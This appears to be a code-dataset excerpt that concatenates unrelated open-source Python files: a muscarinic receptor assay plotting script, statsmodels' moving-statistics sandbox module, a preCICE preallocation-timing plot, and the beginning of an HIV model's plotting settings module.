if x not in BINDING_POOL_DATA_FILES]
TANGO_POOL_DATA_FILES = glob.glob(os.path.join(RESULTS_DIR,
"*tango*/*pool*data.txt"))
ANTAGONIST_POOL_DATA_FILES = glob.glob(
os.path.join(RESULTS_DIR, "*antagonist*/*pool*data.txt"))
BINDING_STRING_MATCH = {'muscarinic': 'm'}
BINDING_BASENAMES = {'muscarinic': 'fig_s9'}
BINDING_TABLE_FILE = 'table_s7.txt'
TANGO_BASENAME = "fig_s10"
ANTAGONIST_BASENAMES = {"m5": "fig_s11"}
TARGET_NAME_FORMAT = {'m1': r"$M_1$", 'm2': r"$M_2$", 'm3': r"$M_3$",
'm4': r"$M_4$", 'm5': r"$M_5$"}
REF_MOLS = {'Atropine', 'Carbachol', 'Acetylcholine'}
NAME_DF = pd.DataFrame.from_csv(
os.path.join(RESULTS_DIR, "compound_name_map.txt"), sep="\t",
header=-1)
NAME_MAP = {str(k): v for k, v in NAME_DF.to_dict().values()[0].iteritems()}
colors = DefaultColors()
def sort_columns(df, ref_mols={}):
if df is None:
return
col_inds = zip(*sorted(enumerate(df.columns),
key=lambda x: (x[1] not in REF_MOLS,
x[1].split(' ')[0], x[0])))[0]
return df.iloc[:, col_inds]
def convert_columns_to_type(df, astype=float):
cols = []
for x in df.columns:
try:
col = astype(x)
except Exception:
col = x
cols.append(col)
df.columns = cols
return df
def read_files(data_files, expect_one=False, sort_cols=True):
exp_prefixes = [x.split('_data')[0] for x in data_files]
fit_files = [x + "_fit.txt" for x in exp_prefixes]
target_data_fit = {}
for prefix, data_file, fit_file in zip(exp_prefixes, data_files,
fit_files):
prefix = os.path.basename(prefix)
tmp = prefix.split("_")
target_name = tmp[0]
try:
exp_name = tmp[1]
except IndexError:
exp_name = ""
data_df = data_df_from_file(data_file, name_map=NAME_MAP)
fit_df = fit_df_from_file(fit_file, name_map=NAME_MAP)
if sort_cols:
data_df = sort_columns(data_df, ref_mols=REF_MOLS)
if expect_one:
assert(target_name not in target_data_fit)
target_data_fit[target_name] = (exp_name, data_df, fit_df)
else:
target_data_fit.setdefault(target_name, []).append(
(exp_name, data_df, fit_df))
return target_data_fit
def count_replicates(data_dfs):
all_counts = {}
for df in data_dfs:
counts = Counter(df.columns)
for name, count in counts.items():
name = name.split()[0]
all_counts.setdefault(name, []).append(count)
return all_counts
def compute_exp_statistics(data_dfs, fit_dfs, pool_fit_df=None, precision=4):
d = {}
for name, rep_counts in count_replicates(data_dfs).items():
d.setdefault("Compound", []).append(name)
rep_counts = sorted(rep_counts)
exp_count = len(rep_counts)
exp_count_str = "{:d} ({:s})".format(exp_count,
", ".join(map(str, rep_counts)))
d.setdefault("Experiment Number", []).append(exp_count_str)
logKis = {}
for df in fit_dfs:
df = df.loc["Best-fit values"]
for col in df.columns:
if 'Global' in col:
continue
name = col.split()[0]
logKi = df[col].loc["logKi"]
logKis.setdefault(name, []).append(logKi)
for name in d["Compound"]:
try:
vals = logKis[name]
logKi_mean, logKi_std = np.mean(vals), np.std(vals)
logKi_str = "{1:.{0:d}f} +/- {2:.{0:d}f}".format(
precision, logKi_mean, logKi_std)
except KeyError:
logKi_str = np.nan
logKi_mean, logKi_std = np.mean(vals), np.std(vals)
d.setdefault("Mean LogKi", []).append(logKi_str)
df = pd.DataFrame.from_dict(d)
if pool_fit_df is not None:
pooled_logKis = []
pooled_logIC50s = []
pooled_Kis = []
for name in df['Compound']:
if name not in pool_fit_df.columns:
pooled_logIC50s.append(np.nan)
pooled_logKis.append(np.nan)
pooled_Kis.append(np.nan)
continue
try:
logKi = float(
pool_fit_df[name].loc['Best-fit values'].loc['logKi'])
logKi_std = float(
pool_fit_df[name].loc['Std. Error'].loc['logKi'])
pooled_logKis.append("{1:.{0:d}f} +/- {2:.{0:d}f}".format(
precision, logKi, logKi_std))
pooled_Kis.append(10**logKi * 1e9)
pooled_logIC50s.append(np.nan)
except KeyError:
logIC50 = float(
pool_fit_df[name].loc['Best-fit values'].loc['LogIC50'])
logIC50_std = float(
pool_fit_df[name].loc['Std. Error'].loc['LogIC50'])
pooled_logIC50s.append("{1:.{0:d}f} +/- {2:.{0:d}f}".format(
precision, logIC50, logIC50_std))
pooled_logKis.append(np.nan)
pooled_Kis.append(np.nan)
df['Pooled LogKi'] = pooled_logKis
df['Pooled Ki (nM)'] = pooled_Kis
df['Pooled LogIC50'] = pooled_logIC50s
return df
if __name__ == "__main__":
# Read binding data
binding_data = read_files(BINDING_DATA_FILES)
pooled_binding_data = read_files(BINDING_POOL_DATA_FILES, expect_one=True)
# Save binding pooled table
exp_stats_dfs = []
for target in pooled_binding_data:
data_dfs = [x[1] for x in binding_data[target]]
fit_dfs = [x[2] for x in binding_data[target]]
exp_stats_df = compute_exp_statistics(
data_dfs, fit_dfs, pool_fit_df=pooled_binding_data[target][2])
exp_stats_df['Target'] = target
exp_stats_dfs.append(exp_stats_df)
exp_stats_df = pd.concat(exp_stats_dfs, axis=0)
exp_stats_df = exp_stats_df[['Target', 'Compound', 'Experiment Number',
'Mean LogKi', 'Pooled LogKi',
'Pooled Ki (nM)', 'Pooled LogIC50']]
exp_stats_df.sort_values(by=['Target', 'Compound'], inplace=True)
exp_stats_df.set_index(['Target', 'Compound'], inplace=True)
exp_stats_df.to_csv(BINDING_TABLE_FILE, sep='\t')
# Plot radioligand assays
for target_family, target_sub in BINDING_STRING_MATCH.items():
targets = sorted([x for x in pooled_binding_data if target_sub in x])
if len(targets) == 0:
continue
num_subplots = len(targets)
num_rows = math.ceil(num_subplots / 2.)
fig = plt.figure(figsize=(5.8, 2.5 * num_rows))
for i, target in enumerate(targets):
exp_name, data_df, fit_df = pooled_binding_data[target]
if np.nanmax(np.abs(data_df)) > 150:
normalize = True
else:
normalize = False
ax = fig.add_subplot(num_rows, 2, i + 1)
title = TARGET_NAME_FORMAT.get(target, target)
plot_experiments(data_df, ax, fit_df=fit_df.loc['Best-fit values'],
colors_dict=colors.mol_colors,
invert=True, normalize=normalize, title=title,
ylabel="Specific Binding (%)")
sns.despine(fig=fig, offset=10)
add_panel_labels(fig=fig, xoffset=.21)
fig.tight_layout()
fig.savefig(BINDING_BASENAMES[target_family] + ".png", dpi=300)
fig.savefig(BINDING_BASENAMES[target_family] + ".tif", dpi=300)
# Plot Tango results
target_data_fit = read_files(TANGO_POOL_DATA_FILES, expect_one=True)
num_subplots = len(target_data_fit)
num_rows = math.ceil(num_subplots / 2.)
fig = plt.figure(figsize=(7, 3 * num_rows))
for i, (target, (exp_name, data_df, fit_df)) in enumerate(
sorted(target_data_fit.items())):
if np.nanmax(np.abs(data_df)) > 150:
normalize = True
else:
normalize = False
ax = fig.add_subplot(num_rows, 2, i + 1)
title = TARGET_NAME_FORMAT.get(target, target)
try:
fit_df = fit_df.loc['Best-fit values']
except AttributeError:
fit_df = None
plot_experiments(data_df, ax, fit_df=fit_df,
colors_dict=colors.mol_colors, invert=False,
normalize=normalize, title=title,
ylabel="Relative Response (%)")
sns.despine(fig=fig, offset=10)
add_panel_labels(fig=fig)
fig.tight_layout()
fig.savefig(TANGO_BASENAME + ".png", dpi=300)
fig.savefig(TANGO_BASENAME + ".tif", dpi=300)
# Plot antagonist results
target_data_fit = read_files(ANTAGONIST_POOL_DATA_FILES, sort_cols=False)
for target, dfs_list in target_data_fit.items():
num_subplots = len(dfs_list)
num_rows = 2 * math.ceil(num_subplots / 2.)
fig = plt.figure(figsize=(7, 3 * num_rows))
for i, (exp_name, data_df, fit_df) in enumerate(dfs_list):
convert_columns_to_type(data_df, float)
convert_columns_to_type(fit_df, float)
unique_cols = sorted(set(data_df.columns))
colors_dict = dict(zip(
unique_cols,
np.tile(np.linspace(0, .75, len(unique_cols)), (3, 1)).T))
ax = fig.add_subplot(num_rows, 2, 2 * i + 1)
if "ACh" in exp_name:
title = "Against Acetylcholine"
elif "CCh" in exp_name:
title = "Against Carbachol"
try:
fit_df = fit_df.loc['Best-fit values']
except AttributeError:
fit_df = None
plot_experiments(data_df, ax, fit_df=fit_df,
colors_dict=colors_dict, invert=False,
normalize=True, title=title,
ylabel="Relative Activity (%)")
ax = fig.add_subplot(num_rows, 2, 2 * i + 2)
plot_schild(fit_df, ax)
add_panel_labels(fig=fig)
sns.despine(fig=fig, offset=10)
fig.tight_layout()
fig.savefig(ANTAGONIST_BASENAMES[target] + ".png", dpi=300)
fig.savefig(ANTAGONIST_BASENAMES[target] + ".tif", dpi=300)
| lgpl-3.0 |
waynenilsen/statsmodels | statsmodels/sandbox/tsa/movstat.py | 34 | 14871 | '''using scipy signal and numpy correlate to calculate some time series
statistics
original developer notes
see also scikits.timeseries (movstat is partially inspired by it)
added 2009-08-29
timeseries moving stats are in c, autocorrelation similar to here
I thought I saw moving stats somewhere in python, maybe not)
TODO
moving statistics
- filters don't handle boundary conditions nicely (correctly ?)
e.g. minimum order filter uses 0 for out of bounds value
-> append and prepend with last resp. first value
- enhance for nd arrays, with axis = 0
Note: Equivalence for 1D signals
>>> np.all(signal.correlate(x,[1,1,1],'valid')==np.correlate(x,[1,1,1]))
True
>>> np.all(ndimage.filters.correlate(x,[1,1,1], origin = -1)[:-3+1]==np.correlate(x,[1,1,1]))
True
# multidimensional, but, it looks like it uses common filter across time series, no VAR
ndimage.filters.correlate(np.vstack([x,x]),np.array([[1,1,1],[0,0,0]]), origin = 1)
ndimage.filters.correlate(x,[1,1,1],origin = 1))
ndimage.filters.correlate(np.vstack([x,x]),np.array([[0.5,0.5,0.5],[0.5,0.5,0.5]]), \
origin = 1)
>>> np.all(ndimage.filters.correlate(np.vstack([x,x]),np.array([[1,1,1],[0,0,0]]), origin = 1)[0]==\
ndimage.filters.correlate(x,[1,1,1],origin = 1))
True
>>> np.all(ndimage.filters.correlate(np.vstack([x,x]),np.array([[0.5,0.5,0.5],[0.5,0.5,0.5]]), \
origin = 1)[0]==ndimage.filters.correlate(x,[1,1,1],origin = 1))
update
2009-09-06: cosmetic changes, rearrangements
'''
from __future__ import print_function
import numpy as np
from scipy import signal
from numpy.testing import assert_array_equal, assert_array_almost_equal
import statsmodels.api as sm
def expandarr(x,k):
#make it work for 2D or nD with axis
kadd = k
if np.ndim(x) == 2:
kadd = (kadd, np.shape(x)[1])
return np.r_[np.ones(kadd)*x[0],x,np.ones(kadd)*x[-1]]
def movorder(x, order = 'med', windsize=3, lag='lagged'):
'''moving order statistics
Parameters
----------
x : array
time series data
order : float or 'med', 'min', 'max'
which order statistic to calculate
windsize : int
window size
lag : 'lagged', 'centered', or 'leading'
location of window relative to current position
Returns
-------
filtered array
'''
#if windsize is even should it raise ValueError
if lag == 'lagged':
lead = windsize//2
elif lag == 'centered':
lead = 0
elif lag == 'leading':
lead = -windsize//2 +1
else:
raise ValueError
if np.isfinite(order) == True: #if np.isnumber(order):
ord = order # note: ord is a builtin function
elif order == 'med':
ord = (windsize - 1)/2
elif order == 'min':
ord = 0
elif order == 'max':
ord = windsize - 1
else:
raise ValueError
#return signal.order_filter(x,np.ones(windsize),ord)[:-lead]
xext = expandarr(x, windsize)
#np.r_[np.ones(windsize)*x[0],x,np.ones(windsize)*x[-1]]
return signal.order_filter(xext,np.ones(windsize),ord)[windsize-lead:-(windsize+lead)]
def check_movorder():
'''graphical test for movorder'''
import matplotlib.pylab as plt
x = np.arange(1,10)
xo = movorder(x, order='max')
assert_array_equal(xo, x)
x = np.arange(10,1,-1)
xo = movorder(x, order='min')
assert_array_equal(xo, x)
assert_array_equal(movorder(x, order='min', lag='centered')[:-1], x[1:])
tt = np.linspace(0,2*np.pi,15)
x = np.sin(tt) + 1
xo = movorder(x, order='max')
plt.figure()
plt.plot(tt,x,'.-',tt,xo,'.-')
plt.title('moving max lagged')
xo = movorder(x, order='max', lag='centered')
plt.figure()
plt.plot(tt,x,'.-',tt,xo,'.-')
plt.title('moving max centered')
xo = movorder(x, order='max', lag='leading')
plt.figure()
plt.plot(tt,x,'.-',tt,xo,'.-')
plt.title('moving max leading')
# identity filter
##>>> signal.order_filter(x,np.ones(1),0)
##array([ 1., 2., 3., 4., 5., 6., 7., 8., 9.])
# median filter
##signal.medfilt(np.sin(x), kernel_size=3)
##>>> plt.figure()
##<matplotlib.figure.Figure object at 0x069BBB50>
##>>> x=np.linspace(0,3,100);plt.plot(x,np.sin(x),x,signal.medfilt(np.sin(x), kernel_size=3))
# remove old version
##def movmeanvar(x, windowsize=3, valid='same'):
## '''
## this should also work along axis or at least for columns
## '''
## n = x.shape[0]
## x = expandarr(x, windowsize - 1)
## takeslice = slice(windowsize-1, n + windowsize-1)
## avgkern = (np.ones(windowsize)/float(windowsize))
## m = np.correlate(x, avgkern, 'same')#[takeslice]
## print(m.shape)
## print(x.shape)
## xm = x - m
## v = np.correlate(x*x, avgkern, 'same') - m**2
## v1 = np.correlate(xm*xm, avgkern, valid) #not correct for var of window
###>>> np.correlate(xm*xm,np.array([1,1,1])/3.0,'valid')-np.correlate(xm*xm,np.array([1,1,1])/3.0,'valid')**2
## return m[takeslice], v[takeslice], v1
def movmean(x, windowsize=3, lag='lagged'):
'''moving window mean
Parameters
----------
x : array
time series data
windsize : int
window size
lag : 'lagged', 'centered', or 'leading'
location of window relative to current position
Returns
-------
mk : array
moving mean, with same shape as x
Notes
-----
for leading and lagging the data array x is extended by the closest value of the array
'''
return movmoment(x, 1, windowsize=windowsize, lag=lag)
def movvar(x, windowsize=3, lag='lagged'):
'''moving window variance
Parameters
----------
x : array
time series data
windsize : int
window size
lag : 'lagged', 'centered', or 'leading'
location of window relative to current position
Returns
-------
mk : array
moving variance, with same shape as x
'''
m1 = movmoment(x, 1, windowsize=windowsize, lag=lag)
m2 = movmoment(x, 2, windowsize=windowsize, lag=lag)
return m2 - m1*m1
def movmoment(x, k, windowsize=3, lag='lagged'):
'''non-central moment
Parameters
----------
x : array
time series data
windsize : int
window size
lag : 'lagged', 'centered', or 'leading'
location of window relative to current position
Returns
-------
mk : array
k-th moving non-central moment, with same shape as x
Notes
-----
If data x is 2d, then moving moment is calculated for each
column.
'''
windsize = windowsize
#if windsize is even should it raise ValueError
if lag == 'lagged':
#lead = -0 + windsize #windsize//2
lead = -0# + (windsize-1) + windsize//2
sl = slice((windsize-1) or None, -2*(windsize-1) or None)
elif lag == 'centered':
lead = -windsize//2 #0#-1 #+ #(windsize-1)
sl = slice((windsize-1)+windsize//2 or None, -(windsize-1)-windsize//2 or None)
elif lag == 'leading':
#lead = -windsize +1#+1 #+ (windsize-1)#//2 +1
lead = -windsize +2 #-windsize//2 +1
sl = slice(2*(windsize-1)+1+lead or None, -(2*(windsize-1)+lead)+1 or None)
else:
raise ValueError
avgkern = (np.ones(windowsize)/float(windowsize))
xext = expandarr(x, windsize-1)
#Note: expandarr increases the array size by 2*(windsize-1)
#sl = slice(2*(windsize-1)+1+lead or None, -(2*(windsize-1)+lead)+1 or None)
print(sl)
if xext.ndim == 1:
return np.correlate(xext**k, avgkern, 'full')[sl]
#return np.correlate(xext**k, avgkern, 'same')[windsize-lead:-(windsize+lead)]
else:
print(xext.shape)
print(avgkern[:,None].shape)
# try first with 2d along columns, possibly ndim with axis
return signal.correlate(xext**k, avgkern[:,None], 'full')[sl,:]
#x=0.5**np.arange(10);xm=x-x.mean();a=np.correlate(xm,[1],'full')
#x=0.5**np.arange(3);np.correlate(x,x,'same')
##>>> x=0.5**np.arange(10);xm=x-x.mean();a=np.correlate(xm,xo,'full')
##
##>>> xo=np.ones(10);d=np.correlate(xo,xo,'full')
##>>> xo
##xo=np.ones(10);d=np.correlate(xo,xo,'full')
##>>> x=np.ones(10);xo=x-x.mean();a=np.correlate(xo,xo,'full')
##>>> xo=np.ones(10);d=np.correlate(xo,xo,'full')
##>>> d
##array([ 1., 2., 3., 4., 5., 6., 7., 8., 9., 10., 9.,
## 8., 7., 6., 5., 4., 3., 2., 1.])
##def ccovf():
## pass
## #x=0.5**np.arange(10);xm=x-x.mean();a=np.correlate(xm,xo,'full')
__all__ = ['movorder', 'movmean', 'movvar', 'movmoment']
if __name__ == '__main__':
print('\ncheckin moving mean and variance')
nobs = 10
x = np.arange(nobs)
ws = 3
ave = np.array([ 0., 1/3., 1., 2., 3., 4., 5., 6., 7., 8.,
26/3., 9])
va = np.array([[ 0. , 0. ],
[ 0.22222222, 0.88888889],
[ 0.66666667, 2.66666667],
[ 0.66666667, 2.66666667],
[ 0.66666667, 2.66666667],
[ 0.66666667, 2.66666667],
[ 0.66666667, 2.66666667],
[ 0.66666667, 2.66666667],
[ 0.66666667, 2.66666667],
[ 0.66666667, 2.66666667],
[ 0.22222222, 0.88888889],
[ 0. , 0. ]])
ave2d = np.c_[ave, 2*ave]
print(movmean(x, windowsize=ws, lag='lagged'))
print(movvar(x, windowsize=ws, lag='lagged'))
print([np.var(x[i-ws:i]) for i in range(ws, nobs)])
m1 = movmoment(x, 1, windowsize=3, lag='lagged')
m2 = movmoment(x, 2, windowsize=3, lag='lagged')
print(m1)
print(m2)
print(m2 - m1*m1)
# this implicitly also tests moment
assert_array_almost_equal(va[ws-1:,0],
movvar(x, windowsize=3, lag='leading'))
assert_array_almost_equal(va[ws//2:-ws//2+1,0],
movvar(x, windowsize=3, lag='centered'))
assert_array_almost_equal(va[:-ws+1,0],
movvar(x, windowsize=ws, lag='lagged'))
print('\nchecking moving moment for 2d (columns only)')
x2d = np.c_[x, 2*x]
print(movmoment(x2d, 1, windowsize=3, lag='centered'))
print(movmean(x2d, windowsize=ws, lag='lagged'))
print(movvar(x2d, windowsize=ws, lag='lagged'))
assert_array_almost_equal(va[ws-1:,:],
movvar(x2d, windowsize=3, lag='leading'))
assert_array_almost_equal(va[ws//2:-ws//2+1,:],
movvar(x2d, windowsize=3, lag='centered'))
assert_array_almost_equal(va[:-ws+1,:],
movvar(x2d, windowsize=ws, lag='lagged'))
assert_array_almost_equal(ave2d[ws-1:],
movmoment(x2d, 1, windowsize=3, lag='leading'))
assert_array_almost_equal(ave2d[ws//2:-ws//2+1],
movmoment(x2d, 1, windowsize=3, lag='centered'))
assert_array_almost_equal(ave2d[:-ws+1],
movmean(x2d, windowsize=ws, lag='lagged'))
from scipy import ndimage
print(ndimage.filters.correlate1d(x2d, np.array([1,1,1])/3., axis=0))
#regression test check
xg = np.array([ 0. , 0.1, 0.3, 0.6, 1. , 1.5, 2.1, 2.8, 3.6,
4.5, 5.5, 6.5, 7.5, 8.5, 9.5, 10.5, 11.5, 12.5,
13.5, 14.5, 15.5, 16.5, 17.5, 18.5, 19.5, 20.5, 21.5,
22.5, 23.5, 24.5, 25.5, 26.5, 27.5, 28.5, 29.5, 30.5,
31.5, 32.5, 33.5, 34.5, 35.5, 36.5, 37.5, 38.5, 39.5,
40.5, 41.5, 42.5, 43.5, 44.5, 45.5, 46.5, 47.5, 48.5,
49.5, 50.5, 51.5, 52.5, 53.5, 54.5, 55.5, 56.5, 57.5,
58.5, 59.5, 60.5, 61.5, 62.5, 63.5, 64.5, 65.5, 66.5,
67.5, 68.5, 69.5, 70.5, 71.5, 72.5, 73.5, 74.5, 75.5,
76.5, 77.5, 78.5, 79.5, 80.5, 81.5, 82.5, 83.5, 84.5,
85.5, 86.5, 87.5, 88.5, 89.5, 90.5, 91.5, 92.5, 93.5,
94.5])
assert_array_almost_equal(xg, movmean(np.arange(100), 10,'lagged'))
xd = np.array([ 0.3, 0.6, 1. , 1.5, 2.1, 2.8, 3.6, 4.5, 5.5,
6.5, 7.5, 8.5, 9.5, 10.5, 11.5, 12.5, 13.5, 14.5,
15.5, 16.5, 17.5, 18.5, 19.5, 20.5, 21.5, 22.5, 23.5,
24.5, 25.5, 26.5, 27.5, 28.5, 29.5, 30.5, 31.5, 32.5,
33.5, 34.5, 35.5, 36.5, 37.5, 38.5, 39.5, 40.5, 41.5,
42.5, 43.5, 44.5, 45.5, 46.5, 47.5, 48.5, 49.5, 50.5,
51.5, 52.5, 53.5, 54.5, 55.5, 56.5, 57.5, 58.5, 59.5,
60.5, 61.5, 62.5, 63.5, 64.5, 65.5, 66.5, 67.5, 68.5,
69.5, 70.5, 71.5, 72.5, 73.5, 74.5, 75.5, 76.5, 77.5,
78.5, 79.5, 80.5, 81.5, 82.5, 83.5, 84.5, 85.5, 86.5,
87.5, 88.5, 89.5, 90.5, 91.5, 92.5, 93.5, 94.5, 95.4,
96.2, 96.9, 97.5, 98. , 98.4, 98.7, 98.9, 99. ])
assert_array_almost_equal(xd, movmean(np.arange(100), 10,'leading'))
xc = np.array([ 1.36363636, 1.90909091, 2.54545455, 3.27272727,
4.09090909, 5. , 6. , 7. ,
8. , 9. , 10. , 11. ,
12. , 13. , 14. , 15. ,
16. , 17. , 18. , 19. ,
20. , 21. , 22. , 23. ,
24. , 25. , 26. , 27. ,
28. , 29. , 30. , 31. ,
32. , 33. , 34. , 35. ,
36. , 37. , 38. , 39. ,
40. , 41. , 42. , 43. ,
44. , 45. , 46. , 47. ,
48. , 49. , 50. , 51. ,
52. , 53. , 54. , 55. ,
56. , 57. , 58. , 59. ,
60. , 61. , 62. , 63. ,
64. , 65. , 66. , 67. ,
68. , 69. , 70. , 71. ,
72. , 73. , 74. , 75. ,
76. , 77. , 78. , 79. ,
80. , 81. , 82. , 83. ,
84. , 85. , 86. , 87. ,
88. , 89. , 90. , 91. ,
92. , 93. , 94. , 94.90909091,
95.72727273, 96.45454545, 97.09090909, 97.63636364])
assert_array_almost_equal(xc, movmean(np.arange(100), 11,'centered'))
| bsd-3-clause |
precice/aste | plotting/plot_preallocation.py | 1 | 1968 | import json, pandas, sys
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
publication = True
if publication:
import plot_helper
plot_helper.set_save_fig_params()
fields = ["PetRBF.fillA", "PetRBF.fillC", "PetRBF.preallocA", "PetRBF.preallocC"]
colors = {f : c for (f, c) in zip(fields,
matplotlib.cm.get_cmap()(np.linspace(0, 1, len(fields)))) }
labels = {"PetRBF.fillA" : "Filling evaluation",
"PetRBF.fillC" : "Filling interpolation",
"PetRBF.preallocA" : "Preallocation evaluation",
"PetRBF.preallocC" : "Preallocation interpolation" }
ticks_labels = {"off" : "No preallocation",
"compute" : "Explicitly computed",
"saved" : "Computed and saved",
"tree" : "Using of spatial tree" }
run_name = sys.argv[1] # like 2018-02-12T16:45:25.141337_testeins
participant = "B"
f_timings = "{run}-{participant}.timings".format(run = run_name, participant = participant)
info = json.load(open(run_name + ".meta"))
df = pandas.read_csv(f_timings, index_col = [0], comment = "#", parse_dates = [0])
ticks = []
x_locs = []
x = -1
for idx, time in enumerate(df.index.unique()):
x += 1
if idx == 4: x += 0.3
cdf = df.loc[time]
y_bottom = 0
for f in fields:
y = cdf[(cdf.Name == f)].Avg.max()
if np.isnan(y): y = 0 # When there is no Prealloc field
plt.bar(x, y, bottom = y_bottom, color = colors[f], label = labels[f] if idx==0 else "")
y_bottom += y
x_locs.append(x)
ticks.append(ticks_labels[info["preallocation"][idx]])
plt.ylabel("Time [ms]")
plt.xticks(x_locs, ticks, rotation = 20)
plt.legend()
plt.gca().yaxis.grid()
if publication:
plot_helper.set_save_fig_params()
# plt.gca().tick_params(axis='x', which='major', pad=15)
plt.subplots_adjust(bottom=0.15)
plt.savefig("preallocation_timings.pdf")
else:
plt.show()
| gpl-3.0 |
janmedlock/HIV-95-vaccine | plots/common.py | 1 | 15852 | '''
Common plotting settings etc.
'''
import collections
import copy
import inspect
import operator
import os
import subprocess
import sys
import tempfile
import time
import unicodedata
import matplotlib
from matplotlib import cm
from matplotlib import colors
from matplotlib import ticker
from matplotlib.backends import backend_pdf
from matplotlib.backends import backend_cairo
import numpy
from PIL import Image
import seaborn
sys.path.append('..')
import model
author = 'Jan Medlock et al'
countries_to_plot = ('Global',
'India',
'Rwanda',
'South Africa',
'Swaziland',
'United States of America')
country_short_names = {
'Bolivia (Plurinational State of)': 'Bolivia',
'Democratic Republic of the Congo': 'DR Congo',
'Iran (Islamic Republic of)': 'Iran',
"Lao People's Democratic Republic": 'Laos',
'Republic of Moldova': 'Moldova',
'Russian Federation': 'Russia',
'Trinidad and Tobago': 'Trinidad & Tobago',
'United States of America': 'United States',
'United Kingdom of Great Britain and Northern Ireland': 'United Kingdom',
'United Republic of Tanzania': 'Tanzania',
'Venezuela (Bolivarian Republic of)': 'Venezuela',
}
matplotlib.rc('mathtext', fontset = 'dejavusans')
# Use Type 1 fonts instead of Type 3.
# matplotlib.rc('pdf', fonttype = 42)
# matplotlib.rc('ps', fonttype = 42)
# PNAS style
width_1column = 20.5 / 6 # inches
width_1_5column = 27 / 6 # inches
width_2column = 42.125 / 6 # inches
height_max = 54 / 6 # inches
rc_black_text = {'text.color': 'black',
'axes.labelcolor': 'black',
'xtick.color': 'black',
'ytick.color': 'black'}
matplotlib.rcParams.update(**rc_black_text)
fontdict = {'family': 'sans-serif',
'sans-serif': 'DejaVu Sans',
'size': 6}
matplotlib.rc('font', **fontdict)
matplotlib.rc('figure', titlesize = fontdict['size'] + 1)
matplotlib.rc('axes', titlesize = fontdict['size'] + 1,
labelsize = fontdict['size'] + 1)
matplotlib.rc('xtick', labelsize = fontdict['size'] - 1)
matplotlib.rc('ytick', labelsize = fontdict['size'] - 1)
matplotlib.rc('xtick.major', pad = 4)
matplotlib.rc('ytick.major', pad = 2)
matplotlib.rc('legend', fontsize = fontdict['size'],
borderpad = 0,
borderaxespad = 0)
matplotlib.rc('lines', linewidth = 1.25)
# matplotlib.rc('axes.grid', which = 'both')
matplotlib.rc('axes.grid', which = 'major')
def get_country_short_name(c):
return country_short_names.get(c, c)
all_regions = list(model.regions.regions)
# all_regions is already sorted by 'Global', then alphabetical.
all_countries = model.datasheet.get_country_list()
# all_countries needs to be sorted by the name on graph.
def country_sort_key(x):
return unicodedata.normalize('NFKD', x)
all_countries.sort(key = country_sort_key)
all_regions_and_countries = all_regions + all_countries
effectiveness_measures = ['new_infections', 'incidence_per_capita',
'infected', 'dead']
t = model.simulation.t
# historical_data_start_year = 1990
historical_data_start_year = 2005
historical_data_style = dict(marker = '.',
markersize = 10,
alpha = 0.7,
color = 'black')
_parameter_names_map = dict(
coital_acts_per_year = 'Coital acts\nper year',
death_years_lost_by_suppression = 'Reduction in\nlifetime with\nviral suppression',
progression_rate_acute = 'Rate of leaving\nacute infection',
suppression_rate = 'Rate of\nviral suppression',
transmission_rate_quantile = 'Transmission\nrate',
transmission_per_coital_act_acute = 'Transmissibility\nduring\nacute phase',
transmission_per_coital_act_unsuppressed = 'Transmissibility\nafter\nacute phase',
transmission_per_coital_act_reduction_by_suppression = 'Relative\ntransmissibility\nwith\nviral suppression'
)
parameter_names = [_parameter_names_map[p]
for p in model.parameters.Parameters.get_rv_names()]
def get_country_results(country,
targets = model.target.all_,
parameters_type = 'sample'):
results = {}
for target in targets:
try:
results[target] = model.results.load(
country, target, parameters_type = parameters_type)
except FileNotFoundError:
results[target] = None
return results
def get_filebase():
stack = inspect.stack()
caller = stack[-1]
filebase, _ = os.path.splitext(caller.filename)
return filebase
class PercentFormatter(ticker.ScalarFormatter):
def _set_format(self, vmin, vmax):
super()._set_format(vmin, vmax)
if self._usetex:
self.format = self.format[: -1] + '%%$'
elif self._useMathText:
self.format = self.format[: -2] + '%%}$'
else:
self.format += '%%'
class UnitsFormatter(ticker.ScalarFormatter):
def __init__(self, units):
self.units = units
super().__init__()
def _set_format(self, vmin, vmax):
super()._set_format(vmin, vmax)
if self._usetex:
self.format = self.format[: -1] + '{}$'.format(self.units)
elif self._useMathText:
self.format = self.format[: -2] + '{}}}$'.format(self.units)
else:
self.format += self.units
def cmap_reflected(cmap_base):
if cmap_base.endswith('_r'):
cmap_base_r = cmap_base[ : -2]
else:
cmap_base_r = cmap_base + '_r'
cmaps = (cmap_base_r, cmap_base)
cmaps_ = [cm.get_cmap(c) for c in cmaps]
def cfunc(k):
def f(x):
return numpy.where(x < 0.5,
cmaps_[0]._segmentdata[k](2 * x),
cmaps_[1]._segmentdata[k](2 * (x - 0.5)))
return f
cdict = {k: cfunc(k) for k in ('red', 'green', 'blue')}
return colors.LinearSegmentedColormap(cmap_base + '_reflected', cdict)
def cmap_scaled(cmap_base, vmin = 0, vmax = 1, N = 256):
cmap = cm.get_cmap(cmap_base)
pts = numpy.linspace(vmin, vmax, N)
colors_ = cmap(pts)
return colors.LinearSegmentedColormap.from_list(cmap_base + '_scaled',
colors_)
_cp = seaborn.color_palette('Paired', 12)
_ix = [6, 7, 0, 1, 2, 3, 4, 5, 8, 9, 10, 11]
colors_paired = [_cp[i] for i in _ix]
def get_target_label(target):
retval = str(target)
i = retval.find('(')
if i != -1:
retval = retval[ : i]
return retval.capitalize()
class StatInfoEntry:
def __init__(self, **kwargs):
# Defaults
self.percent = False
self.scale = None
self.units = ''
for (k, v) in kwargs.items():
setattr(self, k, v)
if self.percent:
self.scale = 1 / 100
self.units = '%%'
def autoscale(self, data):
if len(data) > 0:
vmax = numpy.nanmax(data)
if vmax > 1e6:
self.scale = 1e6
self.units = 'M'
elif vmax > 1e3:
self.scale = 1e3
self.units = 'k'
else:
self.scale = 1
self.units = ''
else:
self.scale = 1
self.units = ''
def autounits(self, data):
if len(data) > 0:
vmax = numpy.nanmax(data) / self.scale
if vmax > 1e6:
self.scale *= 1e6
self.units = 'M'
elif vmax > 1e3:
self.scale *= 1e3
self.units = 'k'
else:
self.units = ''
else:
self.units = ''
_stat_info = dict(
infected = StatInfoEntry(label = 'PLHIV\n'),
prevalence = StatInfoEntry(label = 'Prevalence\n',
percent = True),
incidence_per_capita = StatInfoEntry(label = 'Incidence\n(per M per y)',
scale = 1e-6,
units = None),
drug_coverage = StatInfoEntry(label = 'ART\nCoverage',
percent = True),
AIDS = StatInfoEntry(label = 'PLAIDS\n'),
dead = StatInfoEntry(label = 'HIV-related\ndeaths'),
